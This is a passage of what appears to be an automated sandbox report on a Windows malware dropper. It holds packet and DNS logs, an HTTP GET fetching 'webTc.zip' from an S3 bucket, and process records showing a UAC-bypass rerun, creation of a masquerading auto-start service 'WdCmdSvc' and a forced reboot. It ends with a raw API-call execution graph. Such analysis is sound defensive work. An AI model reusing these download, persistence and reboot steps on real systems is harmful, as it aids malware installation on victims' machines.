                                                                  Feb 23, 2024 15:43:25.369148016 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:25.369148016 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:25.369160891 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:25.369174004 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:25.369205952 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:25.369210958 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:25.369220972 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:25.369251013 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:25.369257927 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:25.369262934 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:25.369297028 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:25.369322062 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:25.369339943 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:25.369360924 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:25.369371891 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:25.369375944 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:25.369390965 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:25.369405985 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:25.369410992 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:25.369421959 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:25.369426966 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:25.369442940 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:25.369465113 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:25.369476080 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:25.369489908 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:25.369507074 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:25.369523048 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:25.369528055 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:25.369551897 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:25.369565010 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:25.369566917 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:25.369577885 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:25.369602919 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:25.369616985 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:25.369622946 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:25.369640112 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:25.369649887 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:25.369657993 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:25.369664907 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:25.369669914 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:25.369689941 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:25.369710922 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:25.369720936 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:25.369725943 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:25.369744062 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:25.369755030 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:25.369760990 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:25.369786024 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:25.369790077 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:25.369798899 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:25.369803905 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:25.369824886 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:25.369826078 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:25.369849920 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:25.369853973 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:25.369873047 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:25.369877100 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:25.369899988 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:25.369904995 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:25.369920969 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:25.369931936 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:25.369951963 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:25.369956017 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:25.369981050 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:25.370001078 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:25.370002985 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:25.370012045 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:25.370031118 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:25.370047092 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:25.370052099 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:25.370075941 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:25.370089054 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:25.370089054 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:25.370106936 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:25.370135069 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:25.370138884 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:25.370157003 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:25.370161057 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:25.370199919 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:25.370199919 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:25.370219946 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:25.370220900 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:25.370232105 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:25.370248079 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:25.370279074 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:25.370279074 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:25.370290995 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:25.370317936 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:25.370327950 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:25.370332956 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:25.370362043 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:25.370373964 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:25.370417118 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:25.370457888 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:25.370465994 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:25.370501041 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:25.370553017 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:25.370599985 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:25.370865107 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:25.381450891 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:25.381462097 CET443497043.5.232.21192.168.2.5
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Feb 23, 2024 15:43:22.002110004 CET | 53003 | 53 | 192.168.2.5 | 1.1.1.1
Feb 23, 2024 15:43:22.096250057 CET | 53 | 53003 | 1.1.1.1 | 192.168.2.5
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Feb 23, 2024 15:43:22.002110004 CET | 192.168.2.5 | 1.1.1.1 | 0x9a8c | Standard query (0) | awsserver903203232.s3.sa-east-1.amazonaws.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Feb 23, 2024 15:43:22.096250057 CET | 1.1.1.1 | 192.168.2.5 | 0x9a8c | No error (0) | awsserver903203232.s3.sa-east-1.amazonaws.com | s3-r-w.sa-east-1.amazonaws.com | | CNAME (Canonical name) | IN (0x0001) | false
Feb 23, 2024 15:43:22.096250057 CET | 1.1.1.1 | 192.168.2.5 | 0x9a8c | No error (0) | s3-r-w.sa-east-1.amazonaws.com | | 3.5.232.21 | A (IP address) | IN (0x0001) | false
Feb 23, 2024 15:43:22.096250057 CET | 1.1.1.1 | 192.168.2.5 | 0x9a8c | No error (0) | s3-r-w.sa-east-1.amazonaws.com | | 16.12.0.18 | A (IP address) | IN (0x0001) | false
Feb 23, 2024 15:43:22.096250057 CET | 1.1.1.1 | 192.168.2.5 | 0x9a8c | No error (0) | s3-r-w.sa-east-1.amazonaws.com | | 16.12.1.50 | A (IP address) | IN (0x0001) | false
Feb 23, 2024 15:43:22.096250057 CET | 1.1.1.1 | 192.168.2.5 | 0x9a8c | No error (0) | s3-r-w.sa-east-1.amazonaws.com | | 16.12.1.74 | A (IP address) | IN (0x0001) | false
Feb 23, 2024 15:43:22.096250057 CET | 1.1.1.1 | 192.168.2.5 | 0x9a8c | No error (0) | s3-r-w.sa-east-1.amazonaws.com | | 3.5.234.171 | A (IP address) | IN (0x0001) | false
Feb 23, 2024 15:43:22.096250057 CET | 1.1.1.1 | 192.168.2.5 | 0x9a8c | No error (0) | s3-r-w.sa-east-1.amazonaws.com | | 3.5.234.115 | A (IP address) | IN (0x0001) | false
Feb 23, 2024 15:43:22.096250057 CET | 1.1.1.1 | 192.168.2.5 | 0x9a8c | No error (0) | s3-r-w.sa-east-1.amazonaws.com | | 52.95.164.82 | A (IP address) | IN (0x0001) | false
                                                                  • awsserver903203232.s3.sa-east-1.amazonaws.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49704 | 3.5.232.21 | 443 | 4284 | C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe
Timestamp | Bytes transferred | Direction | Data
2024-02-23 14:43:22 UTC | 314 | OUT | GET /webTc.zip HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: awsserver903203232.s3.sa-east-1.amazonaws.com
Connection: Keep-Alive
2024-02-23 14:43:23 UTC | 443 | IN | HTTP/1.1 200 OK
x-amz-id-2: bni5vDrEqkLqQoQwMfe5AG8GcDUzsJ6oKpv/EDGtnDIAyKOpuIOc67XZb+8QD77zNULNtJH/3fSFU9duJKcK7znLMdmSyhyb
x-amz-request-id: 4X4V6YSJJ57770R7
Date: Fri, 23 Feb 2024 14:43:23 GMT
Last-Modified: Fri, 23 Feb 2024 03:17:57 GMT
ETag: "88ec493f2a48d234120348aeab6d3808"
x-amz-server-side-encryption: AES256
Accept-Ranges: bytes
Content-Type: application/zip
Server: AmazonS3
Content-Length: 8764801
Connection: close



                                                                  Target ID:0
                                                                  Start time:15:43:17
                                                                  Start date:23/02/2024
                                                                  Path:C:\Users\user\Desktop\0219830219301290321012notas.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:C:\Users\user\Desktop\0219830219301290321012notas.exe
                                                                  Imagebase:0x220000
                                                                  File size:2'102'272 bytes
                                                                  MD5 hash:A548469585481A1B7F98C9B09D271349
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:low
                                                                  Has exited:true

                                                                  Target ID:1
                                                                  Start time:15:43:17
                                                                  Start date:23/02/2024
                                                                  Path:C:\Users\user\Desktop\0219830219301290321012notas.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Users\user\Desktop\0219830219301290321012notas.exe" --rerunningWithoutUAC
                                                                  Imagebase:0x220000
                                                                  File size:2'102'272 bytes
                                                                  MD5 hash:A548469585481A1B7F98C9B09D271349
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:low
                                                                  Has exited:true

                                                                  Target ID:3
                                                                  Start time:15:43:17
                                                                  Start date:23/02/2024
                                                                  Path:C:\Users\user\AppData\Local\SquirrelTemp\Update.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Users\user\AppData\Local\SquirrelTemp\Update.exe" --install . --rerunningWithoutUAC
                                                                  Imagebase:0xb50000
                                                                  File size:1'899'520 bytes
                                                                  MD5 hash:A560BAD9E373EA5223792D60BEDE2B13
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe, Author: Joe Security
                                                                  Reputation:moderate
                                                                  Has exited:true

                                                                  Target ID:4
                                                                  Start time:15:43:19
                                                                  Start date:23/02/2024
                                                                  Path:C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe" --squirrel-firstrun
                                                                  Imagebase:0xc10000
                                                                  File size:22'216 bytes
                                                                  MD5 hash:CC09BB7FDEFC5763CCB3CF7DAE2D76CF
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:Borland Delphi
                                                                  Reputation:moderate
                                                                  Has exited:false

                                                                  Target ID:7
                                                                  Start time:15:43:20
                                                                  Start date:23/02/2024
                                                                  Path:C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe"
                                                                  Imagebase:0xc10000
                                                                  File size:22'216 bytes
                                                                  MD5 hash:CC09BB7FDEFC5763CCB3CF7DAE2D76CF
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:Borland Delphi
                                                                  Reputation:moderate
                                                                  Has exited:false

                                                                  Target ID:8
                                                                  Start time:15:43:27
                                                                  Start date:23/02/2024
                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Windows\System32\cmd.exe" /C sc create WdCmdSvc binPath= "C:\Program Files (x86)\Microsoft.NET\MpCmdRun.exe" start= auto
                                                                  Imagebase:0x790000
                                                                  File size:236'544 bytes
                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:9
                                                                  Start time:15:43:27
                                                                  Start date:23/02/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff6d64d0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:10
                                                                  Start time:15:43:27
                                                                  Start date:23/02/2024
                                                                  Path:C:\Windows\SysWOW64\sc.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:sc create WdCmdSvc binPath= "C:\Program Files (x86)\Microsoft.NET\MpCmdRun.exe" start= auto
                                                                  Imagebase:0x580000
                                                                  File size:61'440 bytes
                                                                  MD5 hash:D9D7684B8431A0D10D0E76FE9F5FFEC8
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:moderate
                                                                  Has exited:true

                                                                  Target ID:13
                                                                  Start time:15:43:36
                                                                  Start date:23/02/2024
                                                                  Path:C:\Windows\SysWOW64\shutdown.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:C:\WINDOWS\system32\shutdown.exe -r -t 1 -f
                                                                  Imagebase:0xee0000
                                                                  File size:23'552 bytes
                                                                  MD5 hash:FCDE5AF99B82AE6137FB90C7571D40C3
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:moderate
                                                                  Has exited:true

                                                                  Target ID:14
                                                                  Start time:15:43:36
                                                                  Start date:23/02/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff6d64d0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                    Execution Graph

                                                                    Execution Coverage:3.6%
                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                    Signature Coverage:4.6%
                                                                    Total number of Nodes:1232
                                                                    Total number of Limit Nodes:31
12442->12443 13176 2320ec 12442->13176 12445 22a8b4 13181 22c193 12445->13181 12448 22af52 GetStartupInfoW 12447->12448 12448->12390 12450 227333 SetDefaultDllDirectories LoadLibraryW GetProcAddress 12449->12450 12450->12394 12595 23d66e 12451->12595 12453 2271fe GetSystemDirectoryW 12596 227615 12453->12596 12455 227222 12600 227688 12455->12600 12457 227238 12604 2275ea 12457->12604 12460 227615 17 API calls 12461 22725a 12460->12461 12462 227688 22 API calls 12461->12462 12463 227270 12462->12463 12464 2275ea 11 API calls 12463->12464 12465 227280 12464->12465 12466 227615 17 API calls 12465->12466 12467 227292 12466->12467 12468 227688 22 API calls 12467->12468 12469 2272a8 12468->12469 12470 2275ea 11 API calls 12469->12470 12471 2272b4 LoadLibraryW LoadLibraryW LoadLibraryW 12470->12471 12472 2275ea 11 API calls 12471->12472 12473 22730a 12472->12473 12474 2275ea 11 API calls 12473->12474 12475 227315 12474->12475 12476 2275ea 11 API calls 12475->12476 12477 227320 12476->12477 12608 23d618 12477->12608 12479 227325 12480 2222a6 12479->12480 12481 2222bb 12480->12481 12486 2222ce 12480->12486 12482 2222d0 lstrlenW 12481->12482 12483 2222c5 12481->12483 12485 2222de 12482->12485 12482->12486 12727 221fce 12483->12727 12740 222157 12485->12740 12486->12398 12488 2222e6 12488->12486 12744 22222b 12488->12744 12494 22a64d 12490->12494 12491 230c66 ___std_exception_copy 3 API calls 12491->12494 12492 22a667 12492->12403 12493 231200 _unexpected 2 API calls 12493->12494 12494->12491 12494->12492 12494->12493 12496 22a669 12494->12496 12495 22ac53 12497 22c3d9 __CxxThrowException@8 RaiseException 12495->12497 12496->12495 12498 22c3d9 __CxxThrowException@8 RaiseException 12496->12498 12499 22ac70 12497->12499 12498->12495 12499->12403 12819 221bdc InitializeCriticalSectionEx 12500->12819 12503 229afd 12504 229b09 __EH_prolog3_catch 12503->12504 12505 229b3b GetCurrentThreadId 12504->12505 12506 22a648 4 API calls 12505->12506 12507 229b51 12506->12507 12507->12410 
12509 226304 GetLastError 12508->12509 12510 22631a GetTokenInformation 12508->12510 12511 226333 12509->12511 12510->12509 12510->12511 12512 226342 CloseHandle 12511->12512 12513 22634b 12511->12513 12512->12513 12514 22a3ad CatchGuardHandler 5 API calls 12513->12514 12515 226358 12514->12515 12515->12413 12517 22c010 ___scrt_fastfail 12516->12517 12518 22234f VerSetConditionMask VerSetConditionMask VerSetConditionMask VerifyVersionInfoW 12517->12518 12519 22a3ad CatchGuardHandler 5 API calls 12518->12519 12520 2223b5 12519->12520 12520->12432 12521 221050 FindResourceW LoadResource 12520->12521 12522 2222a6 18 API calls 12521->12522 12523 221087 12522->12523 12524 22a3ad CatchGuardHandler 5 API calls 12523->12524 12525 22115d 12524->12525 12526 22115f 12525->12526 12822 221dff 12526->12822 12529 221199 RegQueryValueExW 12534 2211c2 12529->12534 12532 22a3ad CatchGuardHandler 5 API calls 12533 2211f2 12532->12533 12533->12424 12533->12425 12832 221e76 12534->12832 12841 23d66e 12535->12841 12537 2223e8 GetModuleHandleW GetModuleFileNameW 12538 2222a6 18 API calls 12537->12538 12539 22241c _wcsrchr 12538->12539 12540 2222a6 18 API calls 12539->12540 12541 22245a 12540->12541 12842 222641 lstrlenW 12541->12842 12543 22246b 12543->12543 12857 2223b7 GetFileAttributesW 12543->12857 12545 2225c7 12547 23d618 5 API calls 12545->12547 12548 2225ef 12547->12548 12548->12400 12548->12432 12549 2223b7 2 API calls 12549->12545 12551 226246 ___scrt_fastfail 12550->12551 12866 221a3f 12551->12866 12554 22a3ad CatchGuardHandler 5 API calls 12555 2262d6 12554->12555 12555->12432 12564 2212fb __EH_prolog3_GS ___scrt_fastfail 12556->12564 12557 221401 ___scrt_fastfail 12558 221fce 17 API calls 12557->12558 12573 22140d 12557->12573 12559 221492 GetTempPathW 12558->12559 12560 2214b3 12559->12560 12561 2214a9 12559->12561 12563 2214c1 GetTempFileNameW 12560->12563 12565 2214ae 12560->12565 12873 221c76 GetLastError 12561->12873 12563->12561 12566 2214e0 12563->12566 12564->12557 
12571 221a3f 3 API calls 12564->12571 12567 221727 12565->12567 12569 221720 CloseHandle 12565->12569 12874 22e16f 12566->12874 12570 221731 DeleteFileW 12567->12570 12567->12573 12569->12567 12570->12573 12571->12557 12572 2214fd _wcsrchr 12572->12565 12574 2216ee 12572->12574 12575 22152d 12572->12575 12577 23d618 5 API calls 12573->12577 12576 22e16f 11 API calls 12574->12576 12878 22e1d3 12575->12878 12579 2216cc 12576->12579 12580 221772 12577->12580 12579->12565 12888 221773 12579->12888 12580->12429 12580->12430 12582 221541 MoveFileW 12582->12561 12585 22155d 12582->12585 12584 2216a3 WaitForSingleObject GetExitCodeProcess 12584->12561 12584->12579 12587 2215d4 12585->12587 12882 221b0b 12585->12882 12587->12561 12587->12565 12587->12584 12589 22a3b6 12588->12589 12590 22a3b8 IsProcessorFeaturePresent 12588->12590 12589->12408 12592 22a42b 12590->12592 13110 22a3ef SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 12592->13110 12594 22a50e 12594->12408 12595->12453 12597 227634 12596->12597 12599 227648 12597->12599 12611 227725 12597->12611 12599->12455 12601 22769f 12600->12601 12601->12601 12602 2276ba 12601->12602 12691 2277ef 12601->12691 12602->12457 12605 227248 12604->12605 12606 2275f5 12604->12606 12605->12460 12607 22703e 11 API calls 12606->12607 12607->12605 12609 22a3ad CatchGuardHandler 5 API calls 12608->12609 12610 23d623 12609->12610 12610->12610 12612 2277a7 12611->12612 12613 22773f 12611->12613 12632 2277ad 12612->12632 12620 2270be 12613->12620 12617 227765 12618 22779c 12617->12618 12627 22703e 12617->12627 12618->12599 12621 2270c6 12620->12621 12622 2270d7 12620->12622 12623 22a648 4 API calls 12621->12623 12624 2270de 12622->12624 12625 22a648 4 API calls 12622->12625 12623->12622 12624->12617 12626 2270f7 12625->12626 12626->12617 12628 227046 12627->12628 12629 227057 Mailbox 12627->12629 12628->12629 12635 22e092 12628->12635 12629->12618 12657 22b256 12632->12657 12640 22e01e 12635->12640 
12637 22e0a1 12647 22e0af IsProcessorFeaturePresent 12637->12647 12639 22e0ae 12641 22e029 12640->12641 12642 22e0af pre_c_initialization 11 API calls 12641->12642 12644 22e037 12641->12644 12643 22e081 12642->12643 12645 22e01e pre_c_initialization 11 API calls 12643->12645 12644->12637 12646 22e08e 12645->12646 12646->12637 12648 22e0bb 12647->12648 12651 22ded4 12648->12651 12652 22def0 ___scrt_fastfail 12651->12652 12653 22df1c IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 12652->12653 12654 22dfed ___scrt_fastfail 12653->12654 12655 22a3ad CatchGuardHandler 5 API calls 12654->12655 12656 22e00b GetCurrentProcess TerminateProcess 12655->12656 12656->12639 12662 22b21c 12657->12662 12661 22b275 12668 22b1cc 12662->12668 12665 22c3d9 12666 22c3f9 RaiseException 12665->12666 12666->12661 12671 22c357 12668->12671 12672 22c364 12671->12672 12678 22b1f8 12671->12678 12672->12678 12679 230c66 12672->12679 12674 22c381 12675 22c391 12674->12675 12684 230c71 12674->12684 12688 230c49 12675->12688 12678->12665 12682 233674 _unexpected 12679->12682 12680 23369d HeapAlloc 12681 2336b0 12680->12681 12680->12682 12681->12674 12682->12680 12682->12681 12683 231200 _unexpected EnterCriticalSection LeaveCriticalSection 12682->12683 12683->12682 12687 230c7e 12684->12687 12685 22e082 pre_c_initialization 11 API calls 12686 230c9e 12685->12686 12686->12675 12687->12685 12687->12686 12689 23363a _free HeapFree GetLastError 12688->12689 12690 230c61 12689->12690 12690->12678 12692 2278db 12691->12692 12693 227818 12691->12693 12694 2277ad 17 API calls 12692->12694 12696 2270be 4 API calls 12693->12696 12695 2278e0 12694->12695 12702 22998c 12695->12702 12698 22784b 12696->12698 12700 22703e 11 API calls 12698->12700 12701 2278af 12698->12701 12699 2278f2 Mailbox 12699->12602 12700->12701 12701->12602 12703 2299ea 12702->12703 12704 22999e 12702->12704 12703->12699 12706 2299ef 12704->12706 12708 2299a7 Mailbox 12704->12708 12705 2299de 
DeleteCriticalSection 12705->12703 12723 229977 RaiseException 12706->12723 12708->12705 12709 2299fb EnterCriticalSection 12712 229a26 12709->12712 12711 229a5f LeaveCriticalSection 12724 229960 12711->12724 12712->12711 12713 229a49 Mailbox 12712->12713 12715 230c49 ___vcrt_freefls@4 2 API calls 12712->12715 12713->12711 12715->12713 12717 229a89 12719 230c49 ___vcrt_freefls@4 2 API calls 12717->12719 12720 229a99 Mailbox 12717->12720 12718 230c49 ___vcrt_freefls@4 2 API calls 12718->12717 12719->12720 12721 22998c 4 API calls 12720->12721 12722 229af8 12721->12722 12722->12699 12723->12709 12725 229975 12724->12725 12726 229969 LeaveCriticalSection 12724->12726 12725->12717 12725->12718 12725->12720 12726->12725 12728 221ff9 ___scrt_fastfail 12727->12728 12729 22202e 12728->12729 12734 222041 Mailbox 12728->12734 12753 221ef4 12729->12753 12731 22203c 12733 22a3ad CatchGuardHandler 5 API calls 12731->12733 12732 222157 4 API calls 12732->12734 12736 222153 12733->12736 12734->12732 12735 22211f 12734->12735 12738 22222b 12 API calls 12734->12738 12760 221f8d 12735->12760 12736->12486 12738->12734 12741 222163 __EH_prolog3_catch 12740->12741 12743 22216f 12741->12743 12766 22a3e1 12741->12766 12743->12488 12745 222239 12744->12745 12749 22224c 12744->12749 12747 22223d 12745->12747 12751 22224e ___scrt_fastfail 12745->12751 12790 22e082 12747->12790 12748 2222a1 12748->12486 12793 2221f0 12749->12793 12751->12749 12752 22e082 pre_c_initialization 11 API calls 12751->12752 12752->12749 12754 221f05 lstrlenW 12753->12754 12756 221f01 12753->12756 12754->12756 12755 221f2c 12757 22222b 12 API calls 12755->12757 12758 221f42 12755->12758 12756->12755 12759 222157 4 API calls 12756->12759 12757->12758 12758->12731 12759->12755 12761 221f99 12760->12761 12765 221fc9 lstrlenW 12760->12765 12762 222157 4 API calls 12761->12762 12763 221fa8 12762->12763 12764 22222b 12 API calls 12763->12764 12763->12765 12764->12765 12765->12731 12768 22a648 12766->12768 12767 230c66 
